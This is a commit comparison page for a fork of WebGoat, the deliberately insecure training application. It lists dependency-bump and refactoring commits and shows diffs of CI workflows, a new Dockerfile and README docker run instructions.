dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: dubey:helm
Branches Tags
dubey:main dubey:nbaars/refactor-plugin-message dubey:nbaars/1873 dubey:nbaars/build dubey:lang-es dubey:gh-1165 dubey:gh-1329 dubey:develop dubey:label-hint-tests dubey:helm-webgoat dubey:helm
dubey:v2025.3 dubey:v2025.2 dubey:v2025.1 dubey:v2025.0 dubey:v2023.8 dubey:v2023.7 dubey:v2023.6 dubey:v2023.5 dubey:v2023.4 dubey:v2023.04 dubey:v2023.3 dubey:v2023.2 dubey:v2023.1 dubey:v2023.0 dubey:v8.2.2 dubey:v8.2.1 dubey:v8.2.0 dubey:vtest10 dubey:vtest9 dubey:vtest8 dubey:vtest7 dubey:vtest6 dubey:vtest5 dubey:vtest4 dubey:vtest3 dubey:vtest2 dubey:vtest1 dubey:vtest dubey:test-v19 dubey:test-v18 dubey:test-v17 dubey:test-v16 dubey:test-v15 dubey:test-v14 dubey:test-v13 dubey:test-v12 dubey:test-v11 dubey:test-v10 dubey:test-v9 dubey:test-v8 dubey:test-v7 dubey:test-v6 dubey:test-v5 dubey:test-v4 dubey:test-v3 dubey:test-v2 dubey:test-v1.0 dubey:v8.1.0 dubey:v8.0.0.M26 dubey:v8.0.0.M25 dubey:v8.0.0.M24 dubey:v8.0.0.M23 dubey:v8.0.0.M22 dubey:v8.0.0.M21 dubey:v8.0.0.M20 dubey:v8.0.0.M19 dubey:v8.0.0.M18 dubey:v8.0.0.M17 dubey:v8.0.0.M16 dubey:v8.0.0 dubey:v8.0.0.M15 dubey:v8.0.0.M14 dubey:v8.0.0.M13 dubey:v8.0.0.M12 dubey:v8.0.0.M11 dubey:v8.0.0.M10 dubey:v8.0.0.M9 dubey:v8.0.0.M8 dubey:8.0.0 dubey:v8.0.0.M7 dubey:v8.0.0.M6 dubey:v8.0.0.M5 dubey:v8.0.0.M4 dubey:v8.0.0.M3 dubey:v8.0.0.M2 dubey:v8.0.0.M1 dubey:7.1 dubey:7.0.1
..
compare: dubey:label-hint-tests
Branches Tags
dubey:main dubey:nbaars/refactor-plugin-message dubey:nbaars/1873 dubey:nbaars/build dubey:lang-es dubey:gh-1165 dubey:gh-1329 dubey:develop dubey:label-hint-tests dubey:helm-webgoat dubey:helm
dubey:v2025.3 dubey:v2025.2 dubey:v2025.1 dubey:v2025.0 dubey:v2023.8 dubey:v2023.7 dubey:v2023.6 dubey:v2023.5 dubey:v2023.4 dubey:v2023.04 dubey:v2023.3 dubey:v2023.2 dubey:v2023.1 dubey:v2023.0 dubey:v8.2.2 dubey:v8.2.1 dubey:v8.2.0 dubey:vtest10 dubey:vtest9 dubey:vtest8 dubey:vtest7 dubey:vtest6 dubey:vtest5 dubey:vtest4 dubey:vtest3 dubey:vtest2 dubey:vtest1 dubey:vtest dubey:test-v19 dubey:test-v18 dubey:test-v17 dubey:test-v16 dubey:test-v15 dubey:test-v14 dubey:test-v13 dubey:test-v12 dubey:test-v11 dubey:test-v10 dubey:test-v9 dubey:test-v8 dubey:test-v7 dubey:test-v6 dubey:test-v5 dubey:test-v4 dubey:test-v3 dubey:test-v2 dubey:test-v1.0 dubey:v8.1.0 dubey:v8.0.0.M26 dubey:v8.0.0.M25 dubey:v8.0.0.M24 dubey:v8.0.0.M23 dubey:v8.0.0.M22 dubey:v8.0.0.M21 dubey:v8.0.0.M20 dubey:v8.0.0.M19 dubey:v8.0.0.M18 dubey:v8.0.0.M17 dubey:v8.0.0.M16 dubey:v8.0.0 dubey:v8.0.0.M15 dubey:v8.0.0.M14 dubey:v8.0.0.M13 dubey:v8.0.0.M12 dubey:v8.0.0.M11 dubey:v8.0.0.M10 dubey:v8.0.0.M9 dubey:v8.0.0.M8 dubey:8.0.0 dubey:v8.0.0.M7 dubey:v8.0.0.M6 dubey:v8.0.0.M5 dubey:v8.0.0.M4 dubey:v8.0.0.M3 dubey:v8.0.0.M2 dubey:v8.0.0.M1 dubey:7.1 dubey:7.0.1

37 Commits
helm ... label-hint

Author SHA1 Message Date
René Zubcevic
dde1008eb8 label test 2022-07-14 18:31:20 +02:00
René Zubcevic
16af4272a5 joda time refactored some dep fix (#1292) 2022-07-14 09:11:06 +02:00
dependabot[bot]
b47568ed69 Bump actions/cache from 3.0.4 to 3.0.5 (#1291) 
Bumps [actions/cache](https://github.com/actions/cache) from 3.0.4 to 3.0.5.
- [Release notes](https://github.com/actions/cache/releases)
- [Changelog](https://github.com/actions/cache/blob/main/RELEASES.md)
- [Commits](https://github.com/actions/cache/compare/v3.0.4...v3.0.5)

---
updated-dependencies:
- dependency-name: actions/cache
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
 2022-07-14 09:03:51 +02:00
René Zubcevic
f8b7ca5c85 Pom update (#1290) 
* asciidoctorj update

* pom and suppression updates
 2022-07-11 13:28:44 +02:00
René Zubcevic
e4eb5d783a Some updates and code improvements (#1288) 
* try with resources

* StringBuilder

* removed ant and updated spring boot
 2022-07-10 17:13:26 +02:00
dependabot[bot]
7dd0dd0923 Bump actions/cache from 3.0.3 to 3.0.4 (#1270) 
Bumps [actions/cache](https://github.com/actions/cache) from 3.0.3 to 3.0.4.
- [Release notes](https://github.com/actions/cache/releases)
- [Changelog](https://github.com/actions/cache/blob/main/RELEASES.md)
- [Commits](https://github.com/actions/cache/compare/v3.0.3...v3.0.4)

---
updated-dependencies:
- dependency-name: actions/cache
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
 2022-06-20 15:25:31 +02:00
dependabot[bot]
aeb481e561 Bump actions/cache from 3.0.2 to 3.0.3 (#1260) 
Bumps [actions/cache](https://github.com/actions/cache) from 3.0.2 to 3.0.3.
- [Release notes](https://github.com/actions/cache/releases)
- [Changelog](https://github.com/actions/cache/blob/main/RELEASES.md)
- [Commits](https://github.com/actions/cache/compare/v3.0.2...v3.0.3)

---
updated-dependencies:
- dependency-name: actions/cache
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
 2022-06-04 18:06:55 +02:00
dependabot[bot]
8a22c88d61 Bump docker/build-push-action from 2.10.0 to 3.0.0 (#1252) 
Bumps [docker/build-push-action](https://github.com/docker/build-push-action) from 2.10.0 to 3.0.0.
- [Release notes](https://github.com/docker/build-push-action/releases)
- [Commits](https://github.com/docker/build-push-action/compare/v2.10.0...v3.0.0)

---
updated-dependencies:
- dependency-name: docker/build-push-action
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
 2022-05-18 08:36:51 +02:00
dependabot[bot]
724666e10f Bump docker/setup-buildx-action from 1 to 2 (#1253) 
Bumps [docker/setup-buildx-action](https://github.com/docker/setup-buildx-action) from 1 to 2.
- [Release notes](https://github.com/docker/setup-buildx-action/releases)
- [Commits](https://github.com/docker/setup-buildx-action/compare/v1...v2)

---
updated-dependencies:
- dependency-name: docker/setup-buildx-action
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
 2022-05-18 08:36:39 +02:00
dependabot[bot]
4953dd63ed Bump docker/setup-qemu-action from 1.1.0 to 2.0.0 (#1254) 
Bumps [docker/setup-qemu-action](https://github.com/docker/setup-qemu-action) from 1.1.0 to 2.0.0.
- [Release notes](https://github.com/docker/setup-qemu-action/releases)
- [Commits](https://github.com/docker/setup-qemu-action/compare/v1.1.0...v2.0.0)

---
updated-dependencies:
- dependency-name: docker/setup-qemu-action
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
 2022-05-18 08:36:28 +02:00
dependabot[bot]
a32055995d Bump docker/login-action from 1.14.1 to 2.0.0 (#1255) 
Bumps [docker/login-action](https://github.com/docker/login-action) from 1.14.1 to 2.0.0.
- [Release notes](https://github.com/docker/login-action/releases)
- [Commits](https://github.com/docker/login-action/compare/v1.14.1...v2.0.0)

---
updated-dependencies:
- dependency-name: docker/login-action
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
 2022-05-18 08:36:01 +02:00
Àngel Ollé Blázquez
3c0b243797 Added new active developer (#1249) 
Fix footer
 2022-05-06 07:34:49 +02:00
Àngel Ollé Blázquez
dfa31e0a28 JWT doc code typo fix (#1247) 2022-04-20 08:16:21 +02:00
René Zubcevic
b32240f96b owasp top10-2021 (#1235) 2022-04-11 21:12:41 +02:00
René Zubcevic
02c3f9551f update spring boot (#1242) 2022-04-11 21:12:10 +02:00
dependabot[bot]
bc91ca86e8 Bump actions/cache from 2.1.7 to 3.0.2 (#1239) 
Bumps [actions/cache](https://github.com/actions/cache) from 2.1.7 to 3.0.2.
- [Release notes](https://github.com/actions/cache/releases)
- [Changelog](https://github.com/actions/cache/blob/main/RELEASES.md)
- [Commits](https://github.com/actions/cache/compare/v2.1.7...v3.0.2)

---
updated-dependencies:
- dependency-name: actions/cache
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
 2022-04-11 18:14:54 +02:00
dependabot[bot]
1dadf20ee0 Bump actions/checkout from 2 to 3 (#1240) 
Bumps [actions/checkout](https://github.com/actions/checkout) from 2 to 3.
- [Release notes](https://github.com/actions/checkout/releases)
- [Changelog](https://github.com/actions/checkout/blob/main/CHANGELOG.md)
- [Commits](https://github.com/actions/checkout/compare/v2...v3)

---
updated-dependencies:
- dependency-name: actions/checkout
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
 2022-04-11 18:14:42 +02:00
dependabot[bot]
4ff41299e3 Bump actions/setup-java from 2 to 3 (#1241) 
Bumps [actions/setup-java](https://github.com/actions/setup-java) from 2 to 3.
- [Release notes](https://github.com/actions/setup-java/releases)
- [Commits](https://github.com/actions/setup-java/compare/v2...v3)

---
updated-dependencies:
- dependency-name: actions/setup-java
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
 2022-04-11 18:14:28 +02:00
Àngel Ollé Blázquez
a9fa53535d Fix Build Badge and Link (#1238) 2022-04-11 07:45:58 +02:00
Nanne Baars
711649924b Refactoring (#1201) 
* Some initial refactoring

* Make it one application

* Got it working

* Fix problem on Windows

* Move WebWolf

* Move first lesson

* Moved all lessons

* Fix pom.xml

* Fix tests

* Add option to initialize a lesson

This way we can create content for each user inside a lesson. The initialize method will be called when a new user is created or when a lesson reset happens

* Clean up pom.xml files

* Remove fetching labels based on language.

We only support English at the moment, all the lesson explanations are written in English which makes it very difficult to translate. If we only had labels it would make sense to support multiple languages

* Fix SonarLint issues

* And move it all to the main project

* Fix for documentation paths

* Fix pom warnings

* Remove PMD as it does not work

* Update release notes about refactoring

Update release notes about refactoring

Update release notes about refactoring

* Fix lesson template

* Update release notes

* Keep it in the same repo in Dockerhub

* Update documentation to show how the connection is obtained.

Resolves: #1180

* Rename all integration tests

* Remove command from Dockerfile

* Simplify GitHub actions

Currently, we use a separate actions for pull-requests and branch build.
This is now consolidated in one action.
The PR action triggers always, it now only trigger when the PR is
opened and not in draft.
Running all platforms on a branch build is a bit too much, it is better
 to only run all platforms when someone opens a PR.

* Remove duplicate entry from release notes

* Add explicit registry for base image

* Lesson scanner not working when fat jar

When running the fat jar we have to take into account we
are reading from the jar file and not the filesystem. In
this case you cannot use `getFile` for example.

* added info in README and fixed release docker

* changed base image and added ignore file

Co-authored-by: Zubcevic.com <rene@zubcevic.com>
 2022-04-09 14:56:12 +02:00
neilnaveen
f3d8206a07 Set permissions for GitHub actions (#1228) 
- Included permissions for the action. https://github.com/ossf/scorecard/blob/main/docs/checks.md#token-permissions

https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions

https://docs.github.com/en/actions/using-jobs/assigning-permissions-to-jobs

[Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)

 Restrict the GitHub token permissions only to the required ones; this way, even if the attackers will succeed in compromising your workflow, they won’t be able to do much.

Signed-off-by: neilnaveen <42328488+neilnaveen@users.noreply.github.com>
 2022-04-09 12:54:32 +02:00
dependabot[bot]
56f5b0f0fa Bump actions/cache from 2.1.7 to 3 (#1220) 
Bumps [actions/cache](https://github.com/actions/cache) from 2.1.7 to 3.
- [Release notes](https://github.com/actions/cache/releases)
- [Commits](https://github.com/actions/cache/compare/v2.1.7...v3)

---
updated-dependencies:
- dependency-name: actions/cache
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
 2022-03-26 14:33:06 +01:00
dependabot[bot]
bed2eed8d8 Bump docker/build-push-action from 2.7.0 to 2.10.0 (#1218) 
Bumps [docker/build-push-action](https://github.com/docker/build-push-action) from 2.7.0 to 2.10.0.
- [Release notes](https://github.com/docker/build-push-action/releases)
- [Commits](https://github.com/docker/build-push-action/compare/v2.7.0...v2.10.0)

---
updated-dependencies:
- dependency-name: docker/build-push-action
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
 2022-03-26 14:32:53 +01:00
dependabot[bot]
984548ae88 Bump actions/checkout from 2 to 3 (#1213) 
Bumps [actions/checkout](https://github.com/actions/checkout) from 2 to 3.
- [Release notes](https://github.com/actions/checkout/releases)
- [Changelog](https://github.com/actions/checkout/blob/main/CHANGELOG.md)
- [Commits](https://github.com/actions/checkout/compare/v2...v3)

---
updated-dependencies:
- dependency-name: actions/checkout
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
 2022-03-09 14:52:49 +01:00
dependabot[bot]
32475ea37e Bump docker/login-action from 1.13.0 to 1.14.1 (#1214) 
Bumps [docker/login-action](https://github.com/docker/login-action) from 1.13.0 to 1.14.1.
- [Release notes](https://github.com/docker/login-action/releases)
- [Commits](https://github.com/docker/login-action/compare/v1.13.0...v1.14.1)

---
updated-dependencies:
- dependency-name: docker/login-action
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
 2022-03-09 14:52:28 +01:00
dependabot[bot]
2332bf22a7 Bump docker/login-action from 1.12.0 to 1.13.0 (#1209) 
Bumps [docker/login-action](https://github.com/docker/login-action) from 1.12.0 to 1.13.0.
- [Release notes](https://github.com/docker/login-action/releases)
- [Commits](https://github.com/docker/login-action/compare/v1.12.0...v1.13.0)

---
updated-dependencies:
- dependency-name: docker/login-action
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
 2022-02-28 07:58:56 +01:00
René Zubcevic
3bc009297e Update SessionManagementTest.java (#1198) 
url() is required in this case. You will notice it when changing host name or when using https
 2021-12-23 17:07:55 +01:00
Nanne Baars
44ab36aa1b Add message that WebGoat should be running while detecting datasource 2021-12-22 15:57:39 +01:00
Nanne Baars
969335f2f6 Update documentation for starting with java -jar 2021-12-22 15:57:11 +01:00
Nanne Baars
c000a9b467 Improve startup message Docker 2021-12-22 12:55:27 +01:00
dependabot[bot]
c5389f31c3 Bump docker/login-action from 1.9.0 to 1.12.0 
Bumps [docker/login-action](https://github.com/docker/login-action) from 1.9.0 to 1.12.0.
- [Release notes](https://github.com/docker/login-action/releases)
- [Commits](https://github.com/docker/login-action/compare/v1.9.0...v1.12.0)

---
updated-dependencies:
- dependency-name: docker/login-action
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>
 2021-12-21 12:53:41 +01:00
Nanne Baars
85d4633f62 Update enforcer and exclude log4j-core completely (every version) 2021-12-21 10:05:12 +01:00
Nanne Baars
7ded0968c1 Ban log4j all together and update OWASP dep check 
Remove
 2021-12-20 21:45:44 +01:00
Zubcevic.com
cb6b1d73d1 upgrade to latest spring-boot libs and fixed related issues 2021-12-20 21:45:44 +01:00
Nanne Baars
44f70ce4dc Remove unnecessary compiler section from pom.xml as it confuses Intellij while importing 2021-12-20 16:45:06 +01:00
Nanne Baars
a42f8fcf75 No progress information for Maven 2021-12-20 16:45:06 +01:00
Nanne Baars
ac4b06f11b Move enabling security to WebGoat core and add resetting the lessons. 
We can use it for more lessons and showcase how to apply security directly from the source code.

Resolves: #1176
 2021-12-20 16:45:06 +01:00
1152 changed files with 3917 additions and 8426 deletions
Expand all files Collapse all files

3
.dockerignore Normal file
View File

@ -0,0 +1,3 @@
**
!/target

1
.editorconfig
View File

@ -12,5 +12,4 @@ ij_continuation_indent_size = 8
ij_formatter_off_tag = @formatter:off ij_formatter_off_tag = @formatter:off
ij_formatter_on_tag = @formatter:on ij_formatter_on_tag = @formatter:on
ij_formatter_tags_enabled = false ij_formatter_tags_enabled = false
ij_wrap_on_typing = true
ij_java_names_count_to_use_import_on_demand = 999 ij_java_names_count_to_use_import_on_demand = 999

54
.github/workflows/branch_build.yml vendored
View File

@ -1,54 +0,0 @@
name: "Branch build"
on:
push:
branches-ignore:
- main
- develop
- release/*
jobs:
install-notest:
if: "github.repository != 'WebGoat/WebGoat'"
runs-on: ubuntu-latest
name: "Package and linting"
steps:
- uses: actions/checkout@v2
- name: set up JDK 17
uses: actions/setup-java@v2
with:
distribution: 'temurin'
java-version: 17
architecture: x64
- name: Cache Maven packages
uses: actions/cache@v2.1.7
with:
path: ~/.m2
key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
restore-keys: ubuntu-latest-m2
- name: Test with Maven
run: mvn install -DskipTests
testing:
if: "github.repository != 'WebGoat/WebGoat'"
needs: install-notest
runs-on: ubuntu-latest
strategy:
matrix:
args:
- mvn -pl '!webgoat-integration-tests' test
- mvn -pl webgoat-integration-tests test
steps:
- uses: actions/checkout@v2
- name: set up JDK 17
uses: actions/setup-java@v2
with:
distribution: 'temurin'
java-version: 17
architecture: x64
- name: Cache Maven packages
uses: actions/cache@v2.1.7
with:
path: ~/.m2
key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
restore-keys: ubuntu-latest-m2
- name: Test with Maven
run: ${{ matrix.args }}

72
.github/workflows/build.yml vendored Normal file
View File

@ -0,0 +1,72 @@
name: "Build"
on:
pull_request:
paths-ignore:
- '.txt'
- '*.MD'
- '*.md'
- 'LICENSE'
- 'docs/**'
push:
branches:
- main
- develop
- release/*
tags-ignore:
- '*'
paths-ignore:
- '.txt'
- '*.MD'
- '*.md'
- 'LICENSE'
- 'docs/**'
jobs:
pr-build:
if: >
github.event_name == 'pull_request' && !github.event.pull_request.draft && (
github.event.action == 'opened' ||
github.event.action == 'reopened' ||
github.event.action == 'synchronize'
)
runs-on: ${{ matrix.os }}
strategy:
matrix:
os: [ubuntu-latest, windows-latest, macos-latest]
steps:
- uses: actions/checkout@v3
- name: Set up JDK 17
uses: actions/setup-java@v3
with:
distribution: 'temurin'
java-version: 17
architecture: x64
- name: Cache Maven packages
uses: actions/cache@v3.0.5
with:
path: ~/.m2
key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
restore-keys: ${{ runner.os }}-m2-
- name: Build with Maven
run: mvn --no-transfer-progress package
build:
if: github.repository == 'WebGoat/WebGoat' && github.event_name == 'push'
runs-on: ubuntu-latest
name: "Branch build"
steps:
- uses: actions/checkout@v3
- name: set up JDK 17
uses: actions/setup-java@v3
with:
distribution: 'temurin'
java-version: 17
architecture: x64
- name: Cache Maven packages
uses: actions/cache@v3.0.5
with:
path: ~/.m2
key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
restore-keys: ubuntu-latest-m2-
- name: Test with Maven
run: mvn --no-transfer-progress verify

45
.github/workflows/pr_build.yml vendored
View File

@ -1,45 +0,0 @@
name: "Pull request build"
on:
pull_request:
paths-ignore:
- '.txt'
- '*.MD'
- '*.md'
- 'LICENSE'
- 'docs/**'
push:
branches:
- main
- release/*
tags-ignore:
- '*'
paths-ignore:
- '.txt'
- '*.MD'
- '*.md'
- 'LICENSE'
- 'docs/**'
jobs:
build:
runs-on: ${{ matrix.os }}
strategy:
matrix:
os: [ubuntu-latest, windows-latest, macos-latest]
java: [17]
steps:
- uses: actions/checkout@v2
- name: Set up JDK ${{ matrix.java }}
uses: actions/setup-java@v2
with:
distribution: 'temurin'
java-version: ${{ matrix.java }}
architecture: x64
- name: Cache Maven packages
uses: actions/cache@v2.1.7
with:
path: ~/.m2
key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
restore-keys: ${{ runner.os }}-m2
- name: Build with Maven
run: mvn package

39
.github/workflows/release.yml vendored
View File

@ -11,21 +11,21 @@ jobs:
environment: environment:
name: release name: release
steps: steps:
- uses: actions/checkout@v2.3.4 - uses: actions/checkout@v3
- name: "Get tag name" - name: "Get tag name"
id: tag id: tag
uses: dawidd6/action-get-tag@v1 uses: dawidd6/action-get-tag@v1
- name: Set up JDK 15 - name: Set up JDK 15
uses: actions/setup-java@v2 uses: actions/setup-java@v3
with: with:
distribution: 'zulu' distribution: 'zulu'
java-version: 15 java-version: 15
architecture: x64 architecture: x64
- name: Cache Maven packages - name: Cache Maven packages
uses: actions/cache@v2.1.7 uses: actions/cache@v3.0.5
with: with:
path: ~/.m2 path: ~/.m2
key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }} key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
@ -38,16 +38,15 @@ jobs:
echo "WEBGOAT_MAVEN_VERSION=${WEBGOAT_MAVEN_VERSION:1}" >> $GITHUB_ENV echo "WEBGOAT_MAVEN_VERSION=${WEBGOAT_MAVEN_VERSION:1}" >> $GITHUB_ENV
- name: Build with Maven - name: Build with Maven
run: | run: |
mvn versions:set -DnewVersion=${{ env.WEBGOAT_MAVEN_VERSION }} mvn --no-transfer-progress versions:set -DnewVersion=${{ env.WEBGOAT_MAVEN_VERSION }}
mvn install -DskipTests mvn --no-transfer-progress install -DskipTests
- name: "Create release" - name: "Create release"
uses: softprops/action-gh-release@v1 uses: softprops/action-gh-release@v1
with: with:
draft: false draft: false
files: | files: |
webgoat-server/target/webgoat-server-${{ env.WEBGOAT_MAVEN_VERSION }}.jar webgoat/target/webgoat-${{ env.WEBGOAT_MAVEN_VERSION }}.jar
webwolf/target/webwolf-${{ env.WEBGOAT_MAVEN_VERSION }}.jar
body: | body: |
## Version ${{ steps.tag.outputs.tag }} ## Version ${{ steps.tag.outputs.tag }}
@ -75,35 +74,37 @@ jobs:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
- name: "Set up QEMU" - name: "Set up QEMU"
uses: docker/setup-qemu-action@v1.1.0 uses: docker/setup-qemu-action@v2.0.0
with: with:
platforms: all platforms: all
- name: "Set up Docker Buildx" - name: "Set up Docker Buildx"
uses: docker/setup-buildx-action@v1 uses: docker/setup-buildx-action@v2
- name: "Login to dockerhub" - name: "Login to dockerhub"
uses: docker/login-action@v1.9.0 uses: docker/login-action@v2.0.0
with: with:
username: ${{ secrets.DOCKERHUB_USERNAME }} username: ${{ secrets.DOCKERHUB_USERNAME }}
password: ${{ secrets.DOCKERHUB_TOKEN }} password: ${{ secrets.DOCKERHUB_TOKEN }}
- name: "Build and push" - name: "Build and push"
uses: docker/build-push-action@v2.7.0 uses: docker/build-push-action@v3.0.0
with: with:
context: ./docker context: ./
file: docker/Dockerfile file: ./Dockerfile
push: true push: true
platforms: linux/amd64, linux/arm64, linux/arm/v7 platforms: linux/amd64, linux/arm64, linux/arm/v7
tags: | tags: |
webgoat/goatandwolf:${{ env.WEBGOAT_TAG_VERSION }} webgoat/webgoat:${{ env.WEBGOAT_TAG_VERSION }}
webgoat/goatandwolf:latest webgoat/webgoat:latest
build-args: | build-args: |
webgoat_version=${{ env.WEBGOAT_MAVEN_VERSION }} webgoat_version=${{ env.WEBGOAT_MAVEN_VERSION }}
- name: "Image digest" - name: "Image digest"
run: echo ${{ steps.docker_build.outputs.digest }} run: echo ${{ steps.docker_build.outputs.digest }}
new_version: new_version:
permissions:
contents: write # for Git to git push
if: github.repository == 'WebGoat/WebGoat' if: github.repository == 'WebGoat/WebGoat'
name: Update development version name: Update development version
needs: [ release ] needs: [ release ]
@ -111,15 +112,15 @@ jobs:
environment: environment:
name: release name: release
steps: steps:
- uses: actions/checkout@v2.3.4 - uses: actions/checkout@v3
with: with:
ref: develop ref: develop
token: ${{ secrets.WEBGOAT_DEPLOYER_TOKEN }} token: ${{ secrets.WEBGOAT_DEPLOYER_TOKEN }}
- name: Set up JDK 15 - name: Set up JDK 17
uses: actions/setup-java@v2 uses: actions/setup-java@v3
with: with:
java-version: 15 java-version: 17
architecture: x64 architecture: x64
- name: Set version to next snapshot - name: Set version to next snapshot

32
Dockerfile Normal file
View File

@ -0,0 +1,32 @@
FROM docker.io/eclipse-temurin:17-jdk-focal
RUN useradd -ms /bin/bash webgoat
RUN chgrp -R 0 /home/webgoat
RUN chmod -R g=u /home/webgoat
USER webgoat
COPY --chown=webgoat target/webgoat-*.jar /home/webgoat/webgoat.jar
EXPOSE 8080
EXPOSE 9090
WORKDIR /home/webgoat
ENTRYPOINT [ "java", \
"-Duser.home=/home/webgoat", \
"-Dfile.encoding=UTF-8", \
"--add-opens", "java.base/java.lang=ALL-UNNAMED", \
"--add-opens", "java.base/java.util=ALL-UNNAMED", \
"--add-opens", "java.base/java.lang.reflect=ALL-UNNAMED", \
"--add-opens", "java.base/java.text=ALL-UNNAMED", \
"--add-opens", "java.desktop/java.beans=ALL-UNNAMED", \
"--add-opens", "java.desktop/java.awt.font=ALL-UNNAMED", \
"--add-opens", "java.base/sun.nio.ch=ALL-UNNAMED", \
"--add-opens", "java.base/java.io=ALL-UNNAMED", \
"--add-opens", "java.base/java.util=ALL-UNNAMED", \
"-Drunning.in.docker=true", \
"-Dwebgoat.host=0.0.0.0", \
"-Dwebwolf.host=0.0.0.0", \
"-Dwebgoat.port=8080", \
"-Dwebwolf.port=9090", \
"-jar", "webgoat.jar" ]

44
README.md
View File

@ -1,6 +1,6 @@
# WebGoat 8: A deliberately insecure Web Application # WebGoat 8: A deliberately insecure Web Application
[![Pull request build](https://github.com/WebGoat/WebGoat/actions/workflows/pr_build.yml/badge.svg?branch=develop)](https://github.com/WebGoat/WebGoat/actions/workflows/pr_build.yml) [![Build](https://github.com/WebGoat/WebGoat/actions/workflows/build.yml/badge.svg?branch=develop)](https://github.com/WebGoat/WebGoat/actions/workflows/build.yml)
[![java-jdk](https://img.shields.io/badge/java%20jdk-17-green.svg)](https://jdk.java.net/) [![java-jdk](https://img.shields.io/badge/java%20jdk-17-green.svg)](https://jdk.java.net/)
[![OWASP Labs](https://img.shields.io/badge/OWASP-Lab%20project-f7b73c.svg)](https://owasp.org/projects/) [![OWASP Labs](https://img.shields.io/badge/OWASP-Lab%20project-f7b73c.svg)](https://owasp.org/projects/)
[![GitHub release](https://img.shields.io/github/release/WebGoat/WebGoat.svg)](https://github.com/WebGoat/WebGoat/releases/latest) [![GitHub release](https://img.shields.io/github/release/WebGoat/WebGoat.svg)](https://github.com/WebGoat/WebGoat/releases/latest)
@ -33,21 +33,15 @@ For more details check [the Contribution guide](/CONTRIBUTING.md)
## 1. Run using Docker ## 1. Run using Docker
Every release is also published on [DockerHub](https://hub.docker.com/r/webgoat/goatandwolf). Every release is also published on [DockerHub](https://hub.docker.com/r/webgoat/webgoat).
The easiest way to start WebGoat as a Docker container is to use the all-in-one docker container. This is a docker image that has WebGoat and WebWolf running inside. The easiest way to start WebGoat as a Docker container is to use the all-in-one docker container. This is a docker image that has WebGoat and WebWolf running inside.
```shell ```shell
docker run -it -p 127.0.0.1:80:8888 -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 -e TZ=Europe/Amsterdam webgoat/goatandwolf:v8.2.2 docker run -it -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 -e TZ=Europe/Amsterdam webgoat/webgoat
``` ```
The landing page will be located at: http://localhost
WebGoat will be located at: http://localhost:8080/WebGoat
WebWolf will be located at: http://localhost:9090/WebWolf
**Important**: *Change the ports if necessary, for example use `127.0.0.1:7777:9090` to map WebWolf to `http://localhost:7777/WebGoat`*
**Important**: *Choose the correct timezone, so that the docker container and your host are in the same timezone. As it is important for the validity of JWT tokens used in certain exercises.* **Important**: *Choose the correct timezone, so that the docker container and your host are in the same timezone. As it is important for the validity of JWT tokens used in certain exercises.*
